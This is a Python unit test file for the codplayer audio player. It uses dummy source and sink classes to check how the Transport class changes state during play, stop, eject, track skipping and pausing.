172187b91662affd8e89f572c0db9be1c4257627
|
[
"MIT"
] | 4
|
2017-03-03T16:59:39.000Z
|
2019-11-08T11:15:06.000Z
|
# codplayer - test the player core, primarily the Transport class
#
# Copyright 2013 Peter Liljenberg <peter.liljenberg@gmail.com>
#
# Distributed under an MIT license, please see LICENSE in the top dir.
import unittest
import threading
import time
import sys
import traceback
import os
from .. import player
from .. import state
from .. import source
from .. import sink
from .. import model
from .. import audio
debug = os.getenv('DEBUG_TEST', 'fake-string-to-disable-logging')
#
# Transport test and helper classes
#
class TestPublisher(object):
"""Some synchronisation to let the test cases detect when the
Transport has updated the state.
"""
def __init__(self, test):
super(TestPublisher, self).__init__()
self.test_id = test.id()
self.updated = threading.Event()
def clear(self):
self.updated.clear()
def wait(self, timeout):
return self.updated.wait(timeout)
def update_state(self, state):
if debug in self.test_id:
sys.stderr.write('{0.test_id}: {1}\n'.format(self, state))
self.updated.set()
class DummySource(source.Source):
"""Packet source generating dummy packets, each a second long.
"""
TRACK_LENGTH_SECS = 1000
TRACK_LENGTH_FRAMES = TRACK_LENGTH_SECS * model.PCM.rate
def __init__(self, disc_id, num_tracks, num_packets = None,
pause_after_track_number = None):
disc = model.DbDisc()
disc.disc_id = disc_id
disc.audio_format = model.PCM
for i in range(num_tracks):
track = model.DbTrack()
track.number = i + 1
track.length = self.TRACK_LENGTH_FRAMES
if pause_after_track_number == track.number:
track.pause_after = True
disc.tracks.append(track)
super(DummySource, self).__init__(disc)
# Inifinite isn't really that, so we know the test eventually stops
self.num_packets = num_packets or self.TRACK_LENGTH_SECS
def iter_packets(self, track_number, packet_rate):
while track_number < len(self.disc.tracks):
track = self.disc.tracks[track_number]
for i in xrange(self.num_packets):
if track.pause_after and i + 1 == self.num_packets:
flags = audio.AudioPacket.PAUSE_AFTER
else:
flags = 0
packet = audio.AudioPacket(self.disc, track, track_number,
i * model.PCM.rate, 1, flags)
packet.data = '0123456789abcdef'
yield packet
track_number += 1
class DummySink(sink.Sink):
def __init__(self, test, *expect):
self.test = test
self.id = test.id()
self.expect = list(expect)
self.expect.reverse()
def on_call(self, func, *args):
if debug in self.id:
sys.stderr.write('{0}: {1}{2}\n'.format(self.id, func, args))
if not self.expect:
self.test.fail('unexpected additional call {0}{1}'.format(func, args))
e = self.expect.pop()
self.test.assertEqual(e.func, func, e.msg)
if e.checks:
try:
e.checks(*args)
except:
self.test.fail(traceback.format_exc())
if e.ret:
try:
return e.ret(*args)
except:
self.test.fail(traceback.format_exc())
def done(self):
if self.expect:
self.test.fail('test finished unexpectedly, {0} events remaining'.format(len(self.expect)))
def pause(self):
return self.on_call('pause')
def resume(self):
self.on_call('resume')
def stop(self):
self.on_call('stop')
def start(self, format):
self.on_call('start', format)
def add_packet(self, packet, offset):
return self.on_call('add_packet', packet, offset)
def drain(self):
return self.on_call('drain')
class Expect(object):
def __init__(self, func, msg = None, checks = None, ret = None):
self.func = func
self.msg = msg
self.checks = checks
self.ret = ret
class DummyPlayer:
def __init__(self, test, publisher):
self._id = test.id()
self._publisher = publisher
def log(self, msg, *args, **kwargs):
if debug in self._id:
sys.stderr.write('{0}: {1}: {2}\n'.format(
self._id, threading.current_thread().name,
msg.format(*args, **kwargs)))
def publish_state(self, state):
self._publisher.update_state(state)
def publish_disc(self, disc):
pass
debug = log
cfg = None
def create_transport(test, sink):
publisher = TestPublisher(test)
return player.Transport(DummyPlayer(test, publisher), sink), publisher
# Actual test cases follow
class TestTransport(unittest.TestCase):
longMessage = True
def test_working_play_stop_at_end(self):
# Single track with three packets
src = DummySource('disc1', 1, 3)
# Delay one packet at a time in a dummy buffer
buf = []
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
self.assertEqual(t.state.track, 1, 'should start playing first track'),
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertEqual(packet.track_number, 0, 'should be first track record'),
self.assertEqual(packet.track.number, 1, 'should be first track number'),
self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
self.assertEqual(offset, 0),
self.assertIs(t.state.state, player.State.PLAY,
'state should set by Transport before getting update from sink'),
self.assertEqual(t.state.disc_id, 'disc1'),
self.assertEqual(t.state.no_tracks, 1),
self.assertEqual(t.state.length, src.TRACK_LENGTH_SECS),
self.assertEqual(t.state.track, 1),
self.assertEqual(t.state.position, 0),
# buffer the packet
buf.append(packet),
),
ret = lambda packet, offset: (len(packet.data), None, None),
),
Expect('add_packet', 'should add second packet',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
self.assertEqual(offset, 0),
self.assertIs(t.state.state, player.State.PLAY),
self.assertEqual(t.state.position, 0,
'state should not have been updated yet'),
# buffer the packet
buf.append(packet),
),
# Return first packet as being played
ret = lambda packet, offset: (len(packet.data), buf.pop(0), None),
),
Expect('add_packet', 'should add third packet',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 2 * model.PCM.rate, 'should be third packet'),
self.assertEqual(offset, 0),
self.assertIs(t.state.state, player.State.PLAY),
self.assertEqual(t.state.position, 0,
'state should show first packet'),
# buffer the packet
buf.append(packet),
),
# Return second packet as being played
ret = lambda packet, offset: (len(packet.data), buf.pop(0), None),
),
Expect('drain', 'should be draining buffered packet',
checks = lambda: (
self.assertIs(t.state.state, player.State.PLAY),
self.assertEqual(t.state.position, 1,
'state should show second packet'),
),
# Return third packet as being played, but keep in buffer
ret = lambda: (buf[0], None),
),
Expect('drain', 'should be draining still buffered packet',
checks = lambda: (
self.assertIs(t.state.state, player.State.PLAY),
self.assertEqual(t.state.position, 2,
'state should show third packet'),
),
# Return third packet as being played and empty buffer
ret = lambda: (buf.pop(0), None),
),
Expect('drain', 'final call to be notified that draining is done',
checks = lambda: (
self.assertIs(t.state.state, player.State.PLAY),
self.assertEqual(t.state.position, 2,
'state should show third packet'),
# Allow test to detect that state has updated
p.clear(),
),
# Tell transport that buffer is empty
ret = lambda: None,
),
Expect('stop', 'should call stop at end of disc',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP,
'transport should stop at end of disc')
self.assertEqual(t.state.length, 0)
self.assertEqual(t.state.track, 0)
self.assertEqual(t.state.position, 0)
def test_writing_partial_packet(self):
# Single track with single packet
src = DummySource('disc1', 1, 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertEqual(offset, 0),
),
ret = lambda packet, offset: (4, packet, None),
),
Expect('add_packet', 'should remaining bytes in first packet',
checks = lambda packet, offset: (
self.assertEqual(offset, 4),
),
ret = lambda packet, offset: (len(packet.data) - 4, packet, None),
),
Expect('drain', 'final call to be notified that draining is done',
checks = lambda: (
# Allow test to detect that state has updated
p.clear(),
),
# Tell transport that buffer is empty
ret = lambda: None,
),
Expect('stop', 'should call stop at end of disc',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP,
'transport should stop at end of disc')
def test_stopping(self):
# Single track with lots of packets
src = DummySource('disc1', 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we stop()'),
# Allow test to detect that state has updated
p.clear(),
# Tell the transport to stop
t.stop(),
self.assertIs(t.state.state, player.State.STOP,
'state should be STOP immediately, since this is a disruptive change'),
self.assertEqual(t.state.length, 0),
self.assertEqual(t.state.track, 0),
self.assertEqual(t.state.position, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP)
def test_eject(self):
# Single track with lots of packets
src = DummySource('disc1', 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we stop()'),
# Allow test to detect that state has updated
p.clear(),
# Tell the transport to eject the disc
t.eject(),
self.assertIs(t.state.state, player.State.NO_DISC,
'state should be NO_DISC immediately, since this is a disruptive change'),
self.assertEqual(t.state.disc_id, None),
self.assertEqual(t.state.no_tracks, 0),
self.assertEqual(t.state.length, 0),
self.assertEqual(t.state.track, 0),
self.assertEqual(t.state.position, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.NO_DISC)
def test_stop_at_end_and_play_again(self):
# Single track with single packet
src = DummySource('disc1', 1, 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
),
),
Expect('add_packet', 'should add only packet',
checks = lambda packet, offset: (
self.assertEqual(offset, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('drain', 'final call to be notified that draining is done',
checks = lambda: (
# Allow test to detect that state has updated
p.clear(),
),
# Tell transport that buffer is empty
ret = lambda: None,
),
Expect('stop', 'should call stop at end of disc',
checks = lambda: (
# Allow test case to sync the middle of the test
done.set(),
),
),
Expect('start', 'should call start on play',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
self.assertEqual(t.state.track, 1, 'should start playing first track'),
),
),
Expect('add_packet', 'should add only packet',
checks = lambda packet, offset: (
self.assertEqual(offset, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('drain', 'final call to be notified that draining is done',
checks = lambda: (
# Allow test to detect that state has updated
p.clear(),
),
# Tell transport that buffer is empty
ret = lambda: None,
),
Expect('stop', 'should call stop at end of disc',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for first run to finish')
self.assertTrue(p.wait(5), 'timeout waiting for first run state to update')
self.assertEqual(t.state.state, player.State.STOP,
'transport should stop at end of disc')
# Now play it again
done.clear()
t.play()
# Wait for second run to finish
self.assertTrue(done.wait(5), 'timeout waiting for second run to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP,
'transport should stop at end of disc')
def test_stopping_and_play_again(self):
# Single track with lots of packets
src = DummySource('disc1', 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertEqual(packet.track_number, 0, 'should be first track record'),
self.assertEqual(packet.track.number, 1, 'should be first track number'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we stop()'),
# Tell the transport to stop
t.stop(),
self.assertIs(t.state.state, player.State.STOP,
'state should be STOP immediately, since this is a disruptive change'),
self.assertEqual(t.state.length, 0),
self.assertEqual(t.state.track, 0),
self.assertEqual(t.state.position, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
Expect('start', 'should call start on playing disc again',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
self.assertEqual(t.state.track, 1, 'should start playing first track'),
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertEqual(packet.track_number, 0, 'should be first track record'),
self.assertEqual(packet.track.number, 1, 'should be first track number'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we stop()'),
# Allow test to detect that state has updated
p.clear(),
# Tell the transport to stop
t.stop(),
self.assertIs(t.state.state, player.State.STOP,
'state should be STOP immediately, since this is a disruptive change'),
self.assertEqual(t.state.length, 0),
self.assertEqual(t.state.track, 0),
self.assertEqual(t.state.position, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for first run to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Now play it again
done.clear()
t.play()
# Wait for second run to finish
self.assertTrue(done.wait(5), 'timeout waiting for second run to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP,
'transport should stop at end of disc')
def test_new_source_while_playing(self):
# Single track with lots of packets
src1 = DummySource('disc1', 1)
# Single track with one packet
src2 = DummySource('disc2', 1, 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on first disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
self.assertEqual(t.state.disc_id, 'disc1')
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we change the disc'),
# Tell the transport to switch to the next source
t.new_source(src2),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING immediately, since this is a disruptive change'),
self.assertEqual(t.state.disc_id, 'disc2'),
self.assertEqual(t.state.no_tracks, 1),
self.assertEqual(t.state.track, 1, 'should start playing first track'),
self.assertEqual(t.state.position, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport on changing disc'),
Expect('start', 'should call start on second disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
self.assertEqual(t.state.track, 1, 'should start playing first track'),
self.assertEqual(t.state.disc_id, 'disc2')
),
),
Expect('add_packet', 'should add only packet',
checks = lambda packet, offset: (
self.assertEqual(offset, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('drain', 'final call to be notified that draining is done',
checks = lambda: (
# Allow test to detect that state has updated
p.clear(),
),
# Tell transport that buffer is empty
ret = lambda: None,
),
Expect('stop', 'should call stop at end of disc',
checks = lambda: (
# Allow test case to sync the middle of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src1)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP)
self.assertEqual(t.state.disc_id, 'disc2')
def test_next_track(self):
# Two tracks with two packets each
src = DummySource('disc1', 2, 2)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
self.assertEqual(t.state.track, 1, 'should start playing first track'),
),
),
Expect('add_packet', 'should add first packet of first track',
checks = lambda packet, offset: (
self.assertEqual(packet.track_number, 0, 'should be first track record'),
self.assertEqual(packet.track.number, 1, 'should be first track number'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we next()'),
# Tell the transport to move to the next track
t.next(),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING while waiting for next track to start'),
self.assertEqual(t.state.track, 2, 'track should be updated'),
self.assertEqual(t.state.position, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport on switching track',
checks = lambda: (
self.assertIs(t.state.state, player.State.PLAY,
'state should still be PLAY, since this is called within next()'),
self.assertEqual(t.state.track, 1, 'track should still be the first track'),
self.assertEqual(t.state.position, 0),
),
),
Expect('start', 'should call start for new track',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should still be WORKING while waiting for next track to start'),
self.assertEqual(t.state.track, 2, 'track should still be the pending track'),
self.assertEqual(t.state.position, 0),
),
),
Expect('add_packet', 'should add first packet of second track',
checks = lambda packet, offset: (
self.assertEqual(packet.track_number, 1, 'should be second track record'),
self.assertEqual(packet.track.number, 2, 'should be second track number'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we next()'),
# Allow test to detect that state has updated
p.clear(),
# Tell the transport to move to the next track (which will stop)
t.next(),
self.assertIs(t.state.state, player.State.STOP,
'state should be STOP since there are no more tracks'),
self.assertEqual(t.state.track, 0, 'track should be updated'),
self.assertEqual(t.state.position, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should call stop at end of disc',
checks = lambda: (
# Allow test case to sync the middle of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP)
def test_prev_track(self):
# Two tracks with four packets each, to be able to test restarting track
src = DummySource('disc1', 2, 4)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
self.assertEqual(t.state.track, 2, 'should start playing second track'),
),
),
Expect('add_packet', 'should add first packet of second track',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
self.assertEqual(packet.track_number, 1, 'should be second track record'),
self.assertEqual(packet.track.number, 2, 'should be second track number'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when starting to play track'),
self.assertEqual(t.state.position, 0, 'should start playing from start of track'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('add_packet', 'should add second packet of second track',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
self.assertEqual(t.state.position, 0, 'position should still be first packet'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('add_packet', 'should add third packet of second track',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 2 * model.PCM.rate, 'should be third packet'),
self.assertEqual(t.state.position, 1, 'position should be second packet'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('add_packet', 'should add fourth packet of second track',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 3 * model.PCM.rate, 'should be fourth packet'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we prev()'),
self.assertEqual(t.state.position, 2, 'position should be third packet when we prev()'),
# Tell transport to restart from start of the second track
t.prev(),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING while waiting for track to restart'),
self.assertEqual(t.state.track, 2, 'should still be the second track'),
self.assertEqual(t.state.position, 0, 'position should be start of track'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport on switching track',
checks = lambda: (
self.assertIs(t.state.state, player.State.PLAY,
'state should still be PLAY, since this is called within prev()'),
self.assertEqual(t.state.track, 2, 'track should still be the second track'),
self.assertEqual(t.state.position, 2, 'position should still be third packet'),
),
),
Expect('start', 'should call start on restart of track',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should still be WORKING while waiting for track to restart'),
self.assertEqual(t.state.track, 2, 'track should still be the second track'),
self.assertEqual(t.state.position, 0, 'position should still be start of track'),
),
),
Expect('add_packet', 'should add first packet of second track',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
self.assertEqual(packet.track_number, 1, 'should be second track record'),
self.assertEqual(packet.track.number, 2, 'should be second track number'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we prev()'),
self.assertEqual(t.state.track, 2, 'track should be the second track when we prev()'),
# Tell the transport to move to the previous track
t.prev(),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING while waiting for prev track to start'),
self.assertEqual(t.state.track, 1, 'should be the first track'),
self.assertEqual(t.state.position, 0, 'position should be start of track'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport on switching track',
checks = lambda: (
self.assertIs(t.state.state, player.State.PLAY,
'state should still be PLAY, since this is called within prev()'),
self.assertEqual(t.state.track, 2, 'track should still be the second track'),
self.assertEqual(t.state.position, 0, 'position should still be first packet'),
),
),
Expect('start', 'should call start on restart of track',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should still be WORKING while waiting for track to restart'),
self.assertEqual(t.state.track, 1, 'track should still be the first track'),
self.assertEqual(t.state.position, 0, 'position should still be start of track'),
),
),
Expect('add_packet', 'should add first packet of first track',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
self.assertEqual(packet.track_number, 0, 'should be first track record'),
self.assertEqual(packet.track.number, 1, 'should be first track number'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we prev()'),
self.assertEqual(t.state.track, 1, 'track should be the first track when we prev()'),
# Allow test to detect that state has updated
p.clear(),
# Tell the transport to move to the previous track, which will stop on start of disc
t.prev(),
self.assertIs(t.state.state, player.State.STOP,
'state should be STOP since we prev() at start of disc'),
self.assertEqual(t.state.track, 0, 'track should be updated'),
self.assertEqual(t.state.position, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should call stop when prev() at start of disc',
checks = lambda: (
# Allow test case to sync the middle of the test
done.set(),
),
),
)
# Kick off test on second track and wait for it
t, p = create_transport(self, expects)
t.new_source(src, 1)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP)
def test_pause_and_resume(self):
# Single track with lots of packets
src = DummySource('disc1', 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we pause()'),
# Tell the transport to pause
t.pause(),
self.assertIs(t.state.state, player.State.PAUSE,
'state should be PAUSE immediately, since the sink "paused" itself'),
self.assertEqual(t.state.position, 0, 'should be paused on first packet'),
),
# Accept packet despite pause - let's pretend it's buffered
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('pause', 'should be told to pause by transport',
checks = lambda: (
self.assertIs(t.state.state, player.State.PLAY,
'state should still be PLAY, since this is called within pause()'),
),
# Tell transport that we are "paused"
ret = lambda: True
),
Expect('add_packet', 'should add second packet while paused',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
self.assertIs(t.state.state, player.State.PAUSE),
# Tell transport to resume again
t.play(),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY immediately'),
self.assertEqual(t.state.position, 0, 'position should still be first packet'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('resume', 'should be told to resume by transport',
checks = lambda: (
self.assertIs(t.state.state, player.State.PAUSE,
'state should still be PAUSE, since this is called within play()'),
),
),
Expect('add_packet', 'should add third packet after resume',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 2 * model.PCM.rate, 'should be third packet'),
self.assertIs(t.state.state, player.State.PLAY),
# Allow test to detect that state has updated
p.clear(),
# Tell transport to stop the test
t.stop(),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP)
def test_play_pause_command(self):
# Single track with lots of packets
src = DummySource('disc1', 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY when we play_pause()'),
# Tell the transport to toggle into pause
t.play_pause(),
self.assertIs(t.state.state, player.State.PAUSE,
'state should be PAUSE immediately, since the sink "paused" itself'),
self.assertEqual(t.state.position, 0, 'should be paused on first packet'),
),
# Accept packet despite pause - let's pretend it's buffered
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('pause', 'should be told to pause by transport',
checks = lambda: (
self.assertIs(t.state.state, player.State.PLAY,
'state should still be PLAY, since this is called within play_pause()'),
),
# Tell transport that we are "paused"
ret = lambda: True
),
Expect('add_packet', 'should add second packet while paused',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
self.assertIs(t.state.state, player.State.PAUSE),
# Tell transport to resume again
t.play_pause(),
self.assertIs(t.state.state, player.State.PLAY,
'state should be PLAY immediately'),
self.assertEqual(t.state.position, 0, 'position should still be first packet'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('resume', 'should be told to resume by transport',
checks = lambda: (
self.assertIs(t.state.state, player.State.PAUSE,
'state should still be PAUSE, since this is called within play_pause()'),
),
),
Expect('add_packet', 'should add third packet after resume',
checks = lambda packet, offset: (
self.assertEqual(packet.abs_pos, 2 * model.PCM.rate, 'should be third packet'),
self.assertIs(t.state.state, player.State.PLAY),
# Allow test to detect that state has updated
p.clear(),
# Tell transport to stop the test
t.stop(),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('stop', 'should be told to stop by transport',
checks = lambda: (
# Allow test case to sync the end of the test
done.set(),
),
),
)
# Kick off test and wait for it
t, p = create_transport(self, expects)
t.new_source(src)
self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
# Check final state
expects.done()
self.assertEqual(t.state.state, player.State.STOP)
def test_pause_after_track(self):
# Two tracks of two packets each, pause after the first one
src = DummySource('disc1', 2, 2, 1)
# Wait for test to finish on an event
done = threading.Event()
expects = DummySink(
self,
Expect('start', 'should call start on new disc',
checks = lambda format: (
self.assertIs(format, model.PCM),
self.assertIs(t.state.state, player.State.WORKING,
'state should be WORKING before any packets have been read'),
),
),
Expect('add_packet', 'should add first packet',
checks = lambda packet, offset: (
self.assertEqual(offset, 0),
self.assertIs(t.state.state, player.State.PLAY),
self.assertEqual(t.state.track, 1),
self.assertEqual(t.state.position, 0),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('add_packet', 'should add second packet',
checks = lambda packet, offset: (
self.assertEqual(offset, 0),
self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
self.assertEqual(packet.flags, packet.PAUSE_AFTER,
'packet should tell transport to pause'),
),
ret = lambda packet, offset: (len(packet.data), packet, None),
),
Expect('drain', 'drain should be called when pausing after track',
checks = lambda: (
self.assertIs(t.state.state, player.State.PLAY),
self.assertEqual(t.state.track, 1),
self.assertEqual(t.state.position, 1, "position should be second packet"),
# Allow test to detect that state has updated
p.clear(),
),
# Tell transport that buffer is empty
ret = lambda: None,
),
